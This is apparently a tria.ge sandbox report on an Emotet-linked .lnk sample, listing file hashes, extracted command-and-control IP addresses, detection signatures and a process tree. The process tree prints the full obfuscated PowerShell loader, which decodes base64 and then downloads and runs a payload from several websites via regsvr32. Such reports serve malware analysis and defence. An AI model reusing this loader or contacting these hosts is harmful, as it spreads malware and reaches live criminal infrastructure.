Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
06/09/2022, 13:38
220906-qxnn7adff7 1014/06/2022, 07:29
220614-jbbdeacfdk 1013/06/2022, 22:26
220613-2cyjfafdb8 1013/06/2022, 20:59
220613-zstjbaagap 10Analysis
-
max time kernel
93s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
13/06/2022, 20:59
Static task
static1
Behavioral task
behavioral1
Sample
UU3444499999999AA.lnk
Resource
win7-20220414-en
General
-
Target
UU3444499999999AA.lnk
-
Size
3KB
-
MD5
08205fbc8d439bb4dbded1b3b4146daa
-
SHA1
f07b89b0bb7691406f109e6be7d59551efa91fc7
-
SHA256
3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
-
SHA512
c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902
Malware Config
Extracted
emotet
Epoch4
149.56.131.28:8080
72.15.201.15:8080
207.148.79.14:8080
82.165.152.127:8080
46.55.222.11:443
213.241.20.155:443
163.44.196.120:8080
51.254.140.238:7080
107.170.39.149:8080
188.44.20.25:443
82.223.21.224:8080
172.104.251.154:8080
164.68.99.3:8080
101.50.0.91:8080
129.232.188.93:443
173.212.193.249:8080
103.132.242.26:8080
186.194.240.217:443
37.187.115.122:8080
91.207.28.33:8080
134.122.66.193:8080
1.234.2.232:8080
103.75.201.2:443
196.218.30.83:443
5.9.116.246:8080
103.70.28.102:8080
41.73.252.195:443
158.69.222.101:443
209.97.163.214:443
185.4.135.165:8080
115.68.227.76:8080
203.114.109.124:443
159.65.140.115:443
110.232.117.186:8080
51.91.76.89:8080
64.227.100.222:8080
150.95.66.124:8080
209.126.98.206:8080
153.126.146.25:7080
45.186.16.18:443
131.100.24.231:80
146.59.226.45:443
160.16.142.56:8080
167.172.253.162:8080
183.111.227.137:8080
119.193.124.41:7080
45.118.115.99:8080
159.89.202.34:443
51.161.73.194:443
212.24.98.99:8080
45.176.232.124:443
206.189.28.199:8080
197.242.150.244:8080
103.43.75.120:443
201.94.166.162:443
151.106.112.196:8080
157.245.196.132:443
159.65.88.10:8080
94.23.45.86:4143
79.137.35.198:8080
1.234.21.73:7080
45.235.8.30:8080
Signatures
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 3064 powershell.exe 14 3064 powershell.exe 16 3064 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 4968 regsvr32.exe 1840 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3064 powershell.exe 3064 powershell.exe 4968 regsvr32.exe 4968 regsvr32.exe 1840 regsvr32.exe 1840 regsvr32.exe 1840 regsvr32.exe 1840 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3064 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2160 wrote to memory of 3064 2160 cmd.exe 81 PID 2160 wrote to memory of 3064 2160 cmd.exe 81 PID 3064 wrote to memory of 4968 3064 powershell.exe 84 PID 3064 wrote to memory of 4968 3064 powershell.exe 84 PID 4968 wrote to memory of 1840 4968 regsvr32.exe 86 PID 4968 wrote to memory of 1840 4968 regsvr32.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmUnBdlMRHO\pcsgrSSvMqxuvCS.dll"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1840
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
459KB
MD5bddd7e892c878e6cada23f13d48b6d13
SHA13044ab0f3e85d402da2e66933da34b9333027756
SHA256f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700
SHA51252ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0
-
Filesize
459KB
MD5bddd7e892c878e6cada23f13d48b6d13
SHA13044ab0f3e85d402da2e66933da34b9333027756
SHA256f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700
SHA51252ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0
-
Filesize
459KB
MD5bddd7e892c878e6cada23f13d48b6d13
SHA13044ab0f3e85d402da2e66933da34b9333027756
SHA256f54d82b18ff1b0aa0adaa6d8e78e2f828550046539b3db84b5d4f4e9bede5700
SHA51252ac6461425d9ea6538c7065f4650611a3ee5aca5b9660c695dd7485d3c89d0a52263ea252e77be259757bbf1ecc6e4da2a7235723149375d95a786c7ad24cf0